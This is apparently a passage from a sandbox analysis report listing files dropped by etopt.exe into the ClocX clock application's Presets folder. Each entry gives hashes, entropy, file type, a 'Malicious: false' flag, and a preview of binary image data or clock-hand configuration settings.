Preview:	.PNG........IHDR...............6....+tEXtCreation Time.Mon 8 Oct 2007 20:07:43 -0800........tIME.........L.....pHYs.........B.4.....gAMA......a...U.IDATx....%Uy...^.....g...A.....(..Q.8.C..8(!'rt..........!....OX#. .(...".c...Q.....0.=Ko.......[5].L.{...z......r..V...{.... .. .. .. ...i..3 ..CU.N...H%...j..T..'..).B...P..K!.HA..J..D.H.."..F!lD(.....#.NXlD0.....#.LXhD0...ua.B%.7"..G.0/HA.....x#~@..D...b..dMC....h..).....Z...t.nJ.......l.;C.G._kA....(.....Y.z..RP.+....r.._.uE.To..m.L....vV.nm..:.v.......V[P.g3m..ck.......R.6..{....z....+.c\D..A.@.Ni..]..._G..?P.}P.wA=IAY?....1..........u.R.z..H....x...Ahb.v@.n......p.....Q\|>[.x.p_WS.n...."T...@.['T_..9....I...,....zc.T..:.J@..:.?...y..Q....n..)J.#($7xB......Eo.... 40a;.E5.i.K.Dy....m.V.........N#......:U<F......(L.../.q..\|.(/.......[^_g}.. .1'l'.hf..3t.G.....1J....x:....w{....]+&:z=..C.e.c.x.F.....@m..w.../e.r..=N{..GB}...#......!F..0.......Z).k.^....<#..+O..........A...q9 .^T1S..<.*.ld.].G..^GqI..n"f. D...Dd..]

C:\Program Files (x86)\ClocX\Presets\hallow2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	925
Entropy (8bit):	4.563557273584791
Encrypted:	false
SSDEEP:	24:BEurZuC5CTzbr1nvlVkLKhaLgGLXoIZKgVi0uzUrn:B9Dyn+nkGUnNU7
MD5:	448E7CA51FF946140E484E2B8685E9C5
SHA1:	DA9FD561CDD1783F0B9A43A842F5B301D13B0BCB
SHA-256:	BAECE35CC80C8ABCFA11089AA019FBEEF1878A0E989C3B49C2734F621CBECC67
SHA-512:	04E23B9632F3A4634BE8107C97956304F9BD528BADFB00F6D69574625037D9150ECDEBCA3F8D820A6D5BF53AD7E9DEBC58A5D4EA225C00DBDBB66D8FE8006688
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=1 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0x553FFF ;color of hour hand.HourLength=75 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=6 ;width of hour hand..MinuteColor=0x18c7f7 ;color of minute hand.MinuteLength=150 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=3 ;width of minute hand..SecondColor=0xFFFFFF ;color of second hand.SecondLength=140 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=200 ;center point's X (default image_width / 2).CenterY=200 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\hallow2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 400 x 400, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	87695
Entropy (8bit):	7.995775848325961
Encrypted:	true
SSDEEP:	1536:2gdcj1dn9NCguYm6249KZqmzkHcX3qNswTBP/o3wdvdGQwPQSXpTfTWpQdZFT:jcfDyLs9Kkm3oVTBP/hVdO/ll9
MD5:	FA8384D8DA635F35BF502976A6DC7F43
SHA1:	4CAD60130366D35DC1EA05099BAFE6DEA0E566A1
SHA-256:	AF0BC4CF79640A01CF9E991D3F73993FF47D7D148F214AF36B6143C269EF1BC3
SHA-512:	65264E3881E216F3077E724C7130E8D3F5E15F1C318D8A9ADE211D480D6F485B20B5EC0D70ADBF94453498CF2BA319BC1E5CFB25E81DB3F6C78B983294E28127
Malicious:	false
Preview:	.PNG........IHDR...............6....+tEXtCreation Time.Mon 8 Oct 2007 20:07:43 -0800........tIME.........L.....pHYs.........B.4.....gAMA......a...U.IDATx....%Uy...^.....g...A.....(..Q.8.C..8(!'rt..........!....OX#. .(...".c...Q.....0.=Ko.......[5].L.{...z......r..V...{.... .. .. .. ...i..3 ..CU.N...H%...j..T..'..).B...P..K!.HA..J..D.H.."..F!lD(.....#.NXlD0.....#.LXhD0...ua.B%.7"..G.0/HA.....x#~@..D...b..dMC....h..).....Z...t.nJ.......l.;C.G._kA....(.....Y.z..RP.+....r.._.uE.To..m.L....vV.nm..:.v.......V[P.g3m..ck.......R.6..{....z....+.c\D..A.@.Ni..]..._G..?P.}P.wA=IAY?....1..........u.R.z..H....x...Ahb.v@.n......p.....Q\|>[.x.p_WS.n...."T...@.['T_..9....I...,....zc.T..:.J@..:.?...y..Q....n..)J.#($7xB......Eo.... 40a;.E5.i.K.Dy....m.V.........N#......:U<F......(L.../.q..\|.(/.......[^_g}.. .1'l'.hf..3t.G.....1J....x:....w{....]+&:z=..C.e.c.x.F.....@m..w.../e.r..=N{..GB}...#......!F..0.......Z).k.^....<#..+O..........A...q9 .^T1S..<.*.ld.].G..^GqI..n"f. D...Dd..]

C:\Program Files (x86)\ClocX\Presets\iSink.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 110 x 110 x 24, resolution 2834 x 2834 px/m, cbSize 36576, bits offset 54
Category:	dropped
Size (bytes):	36576
Entropy (8bit):	6.648959837326361
Encrypted:	false
SSDEEP:	768:1MVcHjhp9uXNffJo8wYUxkM7z7M0L6lfjnjZMRi:vDsMCXMg
MD5:	A7067FA4CEA0838FFF9ED1C329C02A10
SHA1:	CD35E731C2C95C5589C7F612A4438719018422F6
SHA-256:	953AF43628EE6880A3D574DD0A167F58E7CFA4124F66A82BDC9554F177E229BB
SHA-512:	67E3E329B4B9B1DCE2FBE07A3CB9E95538A34ED6E72D640A9548687827FD237DC7E1CD6D27126B729094E754C13CD836E4901779F3BB0715BC77049E12B6B082
Malicious:	false
Preview:	BM........6...(...n...n...............................................................................................................................................................................}}}rrrjjjeee^^^YYYYYYYYYZZZ```ggglllttt......................................................................................................................................................................................................................................................................................kkkZZZIIIBBB>>>>>>@@@CCCJJJOOOTTT[[[YYYTTTQQQLLLGGGCCC@@@@@@AAALLL[[[nnn........................................................................................................................................................................................................................................................mmmQQQ???AAAHHHZZZttt....................................................rrrXXXGGG>>>===VVVsss.....................................................................

C:\Program Files (x86)\ClocX\Presets\iSink.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	16300
Entropy (8bit):	7.877169129816173
Encrypted:	false
SSDEEP:	384:5LaVln1o68AttjFEJ5w0t/4aCOr7fl5gehzqURT5u6ECv:+O69/g5nlQOr7fl55RT5uJCv
MD5:	B932F8103EDDBD166081D7E308135926
SHA1:	92F0FF8B1B5B14F0E034CD91F27160E813874D9C
SHA-256:	9C9D29270D4AD054D858D04D10300A5705B074298F77DE67DC93EB4C2C41FB19
SHA-512:	7C302F0EC5B1F283CA251A57A6CDF199374D8A5C63D2240A0D00E6F83B429EF11DEF9E974CBDC2EC0681D2754B30B3BBDD27BBC571D45F19D55CE4E6DE993DB5
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..?"IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@..&.....h4..p.....U........-.u...L.,...f3Y.]1...Z,..#.\|..A..b.....=..{.m{..9.}g...6x....O.a..\..y.....EY..$...#,..(......Y..R...!."..;..a.l.F]...y..^M.`.w...rM.H..t......1..u]'?.@......B.0d..yFY....q..ma.&...$IBQ.H......x..WU........?50.t:.._3.....BU.......=.. ...h..8.._.H..J...-...../.?@.Bp...{w .Z..3.Z....#...'U.&.3. .\|P3..~P?.dc...l..h.q.....j...^.4...0b....p.... .TrL.6.k......pww..;w......++..P....C1.(.A.....H.._@.:...[`.y.L.O.={.477.....'nn.O.?..(""... .n......P......F.YC.....P..\\\......5k@...`1.u.V1..Dkk......??...T.b1R.9.\...L`.b`cc........6n..*....%....[w...n.X...o....../0a....d.....PI...4$..0'2.".X..?p...G..1UWWK..].E...GEEY...f@.R.t...P..T._.~.\......APD..z..G.2...1.{..\.........J...m....@......x\|.9.....k.^=x.....D...&.s..... .tP.d..x`..;..<.A..,f.;::,...].9....9.X...

C:\Program Files (x86)\ClocX\Presets\iToolsClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 109 x 114 x 24, resolution 2834 x 2834 px/m, cbSize 37448, bits offset 54
Category:	dropped
Size (bytes):	37448
Entropy (8bit):	6.9477013815160555
Encrypted:	false
SSDEEP:	768:ZeYZtcSt3USJzxy5s8aGBYSrJS33M2NKd7iiARW/nhRn3cBz:X5vFas8naSrmc2NaPWW/v+
MD5:	2331BDBA9C0F6FA92572223E3CB1D2B7
SHA1:	9D855A8D1C1ECFE40D00B27AD40DFBED6AD253D1
SHA-256:	FB39E188154A042D73D47CEADA791C364F3CECA5C6787AAAB05096836CABF7B6
SHA-512:	AEC2E4578CA8564CC3A4B3E50F63D2795F314C452E594F7C610F3E1DE41F4CCF5632630AE0E3427C635F8A79935742DEFFDD8776FA77499714679D30CB1D00F3
Malicious:	false
Preview:	BMH.......6...(...m...r.............................................................................................................................................................~~~}}}zzzxxxwwwwwwvvvtttttttttrrrrrrrrrrrrrrrrrrssstttuuuuuuvvvwwwxxxzzzzzz}}}~~~..................................................................................................................................................................................................................................~~~zzzuuuttttttqqqpppmmmjjjjjjgggfffeeeeeeeeecccbbbbbb`````````aaaaaabbbbbbccceeeeeeeeeggghhhjjjkkkmmmoooqqqrrruuuwww{{{~~~.................................................................................................................................................................................................{{{wwwsssnnnnnnjjjgggeeedddaaa___^^^ZZZZZZYYYVVVUUUUUUTTTRRRRRRRRROOOOOOOOOPPPQQQRRRRRRRRRTTTUUUUUUXXXYYYZZZ[[[^^^```cccccceeegggjjjlllqqqtttxxx~~~..................................................

C:\Program Files (x86)\ClocX\Presets\iToolsClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	7.962145343211094
Encrypted:	false
SSDEEP:	768:33epqn5/atVJHkAeHzV2TGjjCIUoqZttx7tP0nmdB9T:3f5e9kAIVbohowj
MD5:	0239C87AD1E60A548109255C1CDDF634
SHA1:	03D224D459FC666A00E8468E656698E7B6D15447
SHA-256:	BA64E4A42FD5847B80B20CD0980ED7A4508BEA01E88C0C6BFA0158860C8323AD
SHA-512:	6A233A1538671C25C11D08ABF8C51A277F62B45007F0174A55FBC0D09766E7BC5A5DA752A3D5AF52C060BF1F45FE568E866D4BDA679996581898E42559BF5433
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..s.IDATx.b...?.(... ..F.`d....M.#....h.... .F......(-.... .V.<`..!...p....[.F..p.......&..Tf..r.g3..F........c'..Wx.....q.....q....Qj.Tv........Y..-u...k".h.......zX........T......R5.44.9'.uN..f0.0W......>...W....X..7U]..\|..d...Ze....=..h..s1Hi..#yf8..2.....2mxv..J..}G...y.C.D......9/.yf..C.r>Sru..z .........[.n. .A .MgW \I<......x.~..'...f.F....4M..6..... jA.H..7.......YD.".K.DZ....[...H.....N.&..V.fA;.0P.K.a.'`#]3...<...h.'.P.3q..P...:..1.......?.......f.......b.&.fp..hff&`.ef`.d..0....l......<?.Y... ......XY.l....03s<gaa.....:.4..LG..Y.)......34.@.j...A ...fqaY0....x.........vFZ..!.a.]....L.....oF....sy..L;..}...!^.N........T.2..)g..+.Jq^..... 3.b..?i....,......`.a.w._v.i.zW...6..@..../c4.X.G..9.6...@m.. ..A......>..Hb.{..+n.}..+.w.8D. ...lo.W.zU......R...(.9c.(%......D.o..A!.29......M8C.......MWa.=x.G...$..b...\|...w.I.B`.{ .b. ....f8.C...

C:\Program Files (x86)\ClocX\Presets\iToolsClock2.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 112 x 112 x 24, resolution 2834 x 2834 px/m, cbSize 37688, bits offset 54
Category:	dropped
Size (bytes):	37688
Entropy (8bit):	5.867000345344529
Encrypted:	false
SSDEEP:	768:/88JTLJqN2AzWf7NhGQYqLhswFrfs6YmUicXZ66gNrHTWOjV:/8g8sAzWf7N4NEtZfgXz06MHTJ5
MD5:	4599B6D452F4FEF6BBB533A2E12CAB3B
SHA1:	9E53546F69F1832C33FAA52CB59154B131991132
SHA-256:	45F75B2EB209AA69FCD83D5945A6EC408DBAA6B63F2EE11440DA2E86153A0ED3
SHA-512:	5F15273223654DAD2204C3188A3551C8BEE188B4B0C895CA8603CC2D0E9322D3615A44D2E18576B9574F7B8222A2826F4D0E8F69CCA6FBB1D4C9F9236C41988A
Malicious:	false
Preview:	BM8.......6...(...p...p...........................................................................................................................................................................}..gu.Sg.?\.4Y.2^.@j.Na.L[.F[.FY.BZ.=W.7X.2Z.4f.@t.T..j..~..........................................................................................................................................................................................................................................................................gl.FW.0Y.<d.Oc.Oh.Ti.Uk.Xm.[y.iz.jl.[h.Wf.Uj.Xh.Vf.Tj.Xi.Wi.Uk.Vs.`k.V^.@X.0l.H..h..................................................................................................................................................................................................................................................\|u.QY.0[.Aa.Lf.Ql.Yn.[s.`u.cu.ct.bt.bx.h..{..ur.cm.^k.\n.^o._u.dv.du.ex.fz.h..uz.hn.[n.[k.Vg.Q_.FZ.2v.T.......................................................

C:\Program Files (x86)\ClocX\Presets\iToolsClock2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24673
Entropy (8bit):	7.8660373232637575
Encrypted:	false
SSDEEP:	768:xKNFVXxc1+jwftQAyOZ1piMTk07EHwvaa8aktocco:UN7DcJTtTk0g6aa8aVY
MD5:	A0FAB9D64776D909D03745CA21568DD7
SHA1:	75A12DFCC4BB1F1160B534409D9F723AD569AB7F
SHA-256:	6165135988469CF85A4352F5D4FCE2643B8F4C42B367C1D7025CA3B02FCE2FCC
SHA-512:	9CCA132390919646F85034F285C008B261C5ACCCB535224A49872779F1883A3872670CD4293E1FE6DF328FB498879887244C6AD0B7AD200508EF3D4C0957EFEC
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F.._.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@...GOq......W...?....6...&.....[...o.....1....../..(.p.00...a.`..$......5#..C.6......3_ddg......V...8...8+.%.}.........Y.{.Y....&.F.$3..%s6 ....@....hA`..df`..bV..w.....a`x.L.....0\|..1/..f...L..'..8.1....v..P.;...........?f..........k..~.#......H..F.<0.Y ..$.Y.X.899..D.........8....1\|`..p...[.._~c`x....@3...?.D..(..?8.0.3.+..e............C.0..PW.).BQ.=J~.....H..&......A+h....4........d..f_ZE.7..{.}.. ...._.:J.0.)._........@..<&..`...6..1.U.~....4..\.8....^j....Jy.9...XD..#.......,.t.......c.F.u..........@......A..\|..s...._L...n.....0.....<8..y.L8..T..Z.........F...<....>.~.p..m...U.....>0~d`.....'..0....A...A1\...P.......c...%.............j....%....L.......a...g.f..........4h..X.....?.yV...SU................N..]9.c..`...3%.S...L@..s..`../. p......?..1,(..`... .,...4..

C:\Program Files (x86)\ClocX\Presets\klokje.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	645
Entropy (8bit):	4.8956136766595355
Encrypted:	false
SSDEEP:	12:a4Eqmz2rrp5pjpuDtOpCRWWh37L4a2Kg1nea90KU9LlTYQUywcG:BEurF5buxOQW8L4ZKg1eY019FUZn
MD5:	6EAFC943CFB82EF659063B558EC46A69
SHA1:	957BC898591918CB6115EC956B736A21F218E3CF
SHA-256:	7D4CF4C12CAA29802E666F1264AB9C6E273DDBB33E1B53228926B5A8C73763F2
SHA-512:	515318860D6D4904BBC323D3FAED4882A105168A1CBDD0D2BD649D8213EAB89D505D8E6CA84E5659CED5879CAE54C4F572ED7596206C8CC054D7C580BB306DA6
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0xff0000 ;cut window by this color (default red).DisableAMPM=0 ;show AM/PM indicator (default 0).AMPMColor=0x201010.;color of AM/PM indicator..HourPNG=klokjehour.hpng.HourPNGCenterDist=13..MinutePNG=klokjemin.hpng.MinutePNGCenterDist=22....SecondColor=0x000000 ;color of second hand.SecondLength=44 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=0.6 ;width of second hand..CenterX=71 ;center point's X (default image_width / 2).CenterY=79 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\klokje.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 142 x 158, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48325
Entropy (8bit):	7.9918505031475355
Encrypted:	true
SSDEEP:	768:pY9E5Eg1OKxlfjEfgzYBLUkFhtzNKgHrOtGHUzNUGIKkV0QnA75GONU836Y:oyEgX21/tKgHpH4NUGGVA8OLqY
MD5:	8E926836D4B639E64589C7A01CB2DBB8
SHA1:	E38F0941462D65192223F15C80096155BE1C97BC
SHA-256:	B42601106DB4FF9063C0C294A8B1F2A6A2748529D4A9C2815DEE331CB94F0437
SHA-512:	6C448249ED96BC717F0C188C379C4F902DB7F826A0B162B5B5E06A8CA6443C307F155D488BACB70A3F301E772234CA2B4BD48E0B37D85087C637B270CA44ED06
Malicious:	false
Preview:	.PNG........IHDR.............kI......pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...;IDATx.\|PAN.A.....Yb...x ..W..g..E.A..;.3]...J....4__....PI.ty...#i.4....B2..J...R.c9......n...B4..Na..?RGk..0..`%.3.<........q6f.A..'l...w.#...lO..$.....N0.....b@..$..U.....+#:[..nj).c..SS...G....]..."+uV.).B.+.&v5...r.(%.......5.....C.BJx.dHf3N.R.VkQ.f..Y..?..'...a....i4..?...?k.la3.....:e?RW.sc..66....L.2..f....ey.....x$.iS!.....\..M@.D.`.6.....=.........V@+...._..=+.;.j....T..C,4M.".DR..)?..blBb....q...`.s.s......r.\|{}.Z?.......t,.}....96.O....x..........F.5.qE...Q..5..........v..a j'N+U\|...k\QE....7Y.p...f&Vh(.?P.8.@(C._.&.....?..\._...Y.4...,{..~u...S...O.;.u..w......k..l..[.6..+v..tF..[(......yN.i.N.F>.0kQ.dw.............X.=.....~}}.g..NmE.m.....H.'F.1..-].xAWo.._'..b.>.W"M9FcV.d..(.....r.A...h.~.......?...R.&....D...bk..t..rV....^..6YR...D...\|....e.]...q.#..1..6..*...8..W.j..$.t.At.Vz/......3G.....v%..i.....{...TGI...

C:\Program Files (x86)\ClocX\Presets\klokjehour.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 34 x 8, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	1276
Entropy (8bit):	7.204792043876142
Encrypted:	false
SSDEEP:	24:Vq0kBWKRD/SdTcFMjulNQIXRI/XlvSF+2hAJO0Q28cFkoVHqelN:Vq0Op6dTcm6KuIfE9hAA0Q2NFhL7
MD5:	3CE465C5A6FA15ED85F3D78B5D9A669A
SHA1:	D9EB7392ECFB586CC6BA793F44E3EBC6C68D15C6
SHA-256:	C61F93D21895B392CA21395735D01D4514E279EF4BA7A34CC20DECD1B818ECBC
SHA-512:	EA0536484F718A2A919148ACCD6FC906643A8706F413D7DCC53C416C4916EDFF3A9EBF8756F264898947A35824844CFE12F783EF4E060AF7A84D2504E5ACB5DE
Malicious:	false
Preview:	.PNG........IHDR..."..........w......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b^.v......vV.>............i.J._...Ky.8....1$,...3L....r033....).....?..Y:..........g"..../_.1..........o&9....8....!...................................Z..E......._......................................................}..........E...............:.......{...................i...2.......r..................E....JFK............................................1...........................-.m.4.<...u................PPQ{...+?..........'...r.... .T....E....ddc...,....fjr........................2..............................E....@FD.B;;....b!%$....................+...L...q !$.......................q..u.S...r.5..I.gd......#`lD...,......?..... #-....G.a~...O.3......?l,L.L..graa.R.z...?..D...q..........dd~...?.f6V............8H@...@.)Y..~\|.,.Z....w.._^2p.3.W7w....7....`...RL.,,@.#.GVV6..~^....?.oN...?....;.&....~.1......_..ll.............+..Y`...t.3(~~.... ....v............

C:\Program Files (x86)\ClocX\Presets\klokjemin.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 50 x 9, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	1896
Entropy (8bit):	7.566424556834186
Encrypted:	false
SSDEEP:	48:+UBnMSY1NiJ7G+lYXQd1GCkVrTzjI2yvf:+UVvbYXc1k1zW
MD5:	9D6062887C1AC43745755AF0DECB59CF
SHA1:	03F8C2912DA77D162468D97B29583446DE040CDD
SHA-256:	1F6F37ADB95BC0E517F8AA261C2EA545368CE5A3893C869DF24F84B2E051109B
SHA-512:	F927E9B556D89717AE7E150CF765436B52AC6F5E8C3E495C341EB0AA4A72AE243819F380BD6A0FE902B41FB4BEF99143354B766766BA5A322072AC2726E72B42
Malicious:	false
Preview:	.PNG........IHDR...2...........OI....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o........IDATx.b.t.&.';+..#..,-,.6m............@....g.bV ..bF ..1.... ..K.J7y...].\|.A._....7........R....P..==.`]...5....FLQ.=83....{.............................................!+&4l.....32..{.h.r.S.S...~3p..1<y............1....uqw....@.......................*...................66..D....k.(f.q.&.. 6.U+....e...........p........MRQA...~$%$....++-.66/.............=@>............SQQo........................#" ...e...........p....wmrG.!.....G............../.[Zc.....fhl9........804.......................................q....;w.X....$..g...^.x....'...].&. fe.......\.................o.c..Pg........xyy.....<...X......e...............\...........4.......................>...4.......L...............................................zB.....qr.x.....?F...0..dg`gc...Lo@.....S.h..FV..7...r..20.._..10.>...1202.....'aQA.._..UWW....e................................596.)(%.....;6C................N.

C:\Program Files (x86)\ClocX\Presets\longhorn.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1472
Entropy (8bit):	4.873829154814499
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4ATORXFB01rfwkpZdGm8bCi+ZQibQ0Wd9iBxLuQI:BzqFluf11FK3fdGmQEZHQJTiBxLvI
MD5:	46C0294FE18ADF12E512CC5CEB02FF8A
SHA1:	7A3D6DCC3452649FB56A22991CD46B2575A8B6FD
SHA-256:	8CFE40FCB3B948BCEB7969332B8F4A1E5955472C98D5B947C0D3AF72F05A82E6
SHA-512:	CDBBFDC50C9EE314E46C607BB5AB1FA11639E07D142CA36A1F993D069322353F22510318A4D5919BFD1749C5B8E350B1E8A31700FDD0C96444C7F288F08A96CF
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0xAA5F55 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xAA5F55 ;color of minute hand..MinuteLength=41 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=42 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....Ce

C:\Program Files (x86)\ClocX\Presets\longhorn.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 126 x 108, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	11115
Entropy (8bit):	7.945943612326477
Encrypted:	false
SSDEEP:	192:BSbxSBebSHnFYdZNEJnPM6Tk2jdQ5yKappg76uyqLi318HhC2e:BSbx64+n2do1PpgqdQ5PapYBL4SCz
MD5:	3768C9DE0BA6520395EF84D7F56C02BF
SHA1:	31A5FB80E4F7DC3BFC2B8BF016EF722BAF2CF2F7
SHA-256:	2F8C5FD250D6F896C96C44984AA11C1B924696DBFD11270D624B68B0B255D521
SHA-512:	34BDB2BCB4DD4A3E19CF49E5427EBB38F4645B4285EDE9555AD1A534C32ADDD6DEBBEA71655A2A87E9B4834FB06E6268ED706EA4519991EDFEF7D332E3F0EBAB
Malicious:	false
Preview:	.PNG........IHDR...~...l......=......pHYs...........~... .IDATx..w.\..y6..g....;3...2.6....c.a...,0AXd.....N.....:...9!........~.O.{.V..3....[.n.p~_:......A._...........K...3.....r....x....Hx.....{.....4.r.o`..o....^.....S......._l..?...........<V]]..D..x\|ww..._._..../..=..O.<..E.x=^.........\|..?y..?.-y.}.\|.-.a.u......Bkhh...'.-m.m...b.......=...b...}<...w/E.[g...>UWW..X,......................p......}...(.p.o .lZ.+W..A...'.d.m.npp..2..B..5..?S......+..x.......e..ik..8....wG..6SzG.ZKJ.cg....J.2.dgf.Y^XX.~.....W..4.w<]YY..*CWW......c..{....\|....E.....lr...?..z......E.e...>....XC.yB.+...rU....t@+..T...h...".......9{..OC.Pp..(...>3....}....u.;.r.d#....v..T7.}W9.$/''wuqi.T.pu.....;g...?....?..x....W%..7 ..q.......O.......g..t...........g...........l.....r..!.!W!.........-..[P.}7.....w.7....ZnA....P......9.C.@. mT..S........E\|...0.....H$.0=.....C..............i..W.U.............g.u/_......1......B..\+...:...z......[w...

C:\Program Files (x86)\ClocX\Presets\mars.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 250 x 250, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	48014
Entropy (8bit):	7.986851682633987
Encrypted:	false
SSDEEP:	768:iNAFMfapVRMLrN41wNbVDgrnTjBebwTXR2B6tYhfU3XlGfKWFDJrtw+dceO06ANw:iNAF5VUEEbirTdmwTgBLhfUFGl5dG0na
MD5:	ABE2E3676135DC72C21F6AC4D55D5C8C
SHA1:	43073CC174592A80D8E2D7AD23BFA2164B92774F
SHA-256:	EF28D4EF8CAB0CEEFD7B60FE2C2ECDE52DECFEA74B041C452046DDDD4852CBA8
SHA-512:	6F7953B3655F08FFFD73AA779BAC4E49ECDDAB36323F4ED8C2CE32EA38365A074FF4F4F02FB240BAE62690D002C944ED8E17E2189425E387CECE970392A098B2
Malicious:	false
Preview:	.PNG........IHDR...............Z=....pHYs...t...t..f.x....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx...i...v....y.Z{...._.J.e..cc.....&.).`...pR.SE......Ec.C....+4......P\|IH..eDY.u.k]].{....z..#...Z..e.....S>.......^{.9....#...<.........\.K._..sy..~y......<..R...\.K._..sy..~y......<..R...\...\..s)..sy.../..<.B.<...\...\..s)..sy.../..<.B.<..R...\.K._..sy..~y......<..R...\.K._..sy..~y......<.B.<...\...\..s)..sy.../..<.B.<...\...\..s)..sy.../..<......+..o..;...\|.mD:O....y.;;j........+.....).....5./P.S'.r{{K....'O.q..}J..5.v@.N.pX.&\.[......3...;.J.'D...a..wy..........-\....5.....{w./~.K.m.....;..y..<...y.?.u....n..2Os..........=.F..t..~l}..wv.?c..f..>.w_}.o...gO....ly.../?x..7.....\|......*"....'.JUz7..C......?@T..........g..w........e...Z...5w..x.....7..T..`..n`...`q.i3.7O..)h.(u....,Z........\|...._.......;f..!"/.._Y....k....f...f..'?..oOZ.n.:...Z..-.D.fj.B.g.yBDq3..~.....p`..n.k....}9...zo?....w./...w

C:\Program Files (x86)\ClocX\Presets\negro2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.79578084741415
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrUBRSTOLX01rfPkp+dGm8JiX33NPeibQ0Wd9iBxLuQI:BzqFlQGiEdGmxtPBQJTiBxLvI
MD5:	D4C8BC1C07C0077783E15664BADF33E3
SHA1:	EF27B3AE33D84581098C96384784282E090AFAC1
SHA-256:	051468A847913306CF9FB5DCBF17BDDAB5AC36689DCBA6DA0374DBBB5383B6C0
SHA-512:	5F7C44CE2FBB1E4FA332436CAFDE4085A91CC55DFDC404143A586B3777AA168783F6D82396C57C443102CE9606E044845E5680209FF8234D78CCEC9E5FF4632A
Malicious:	false
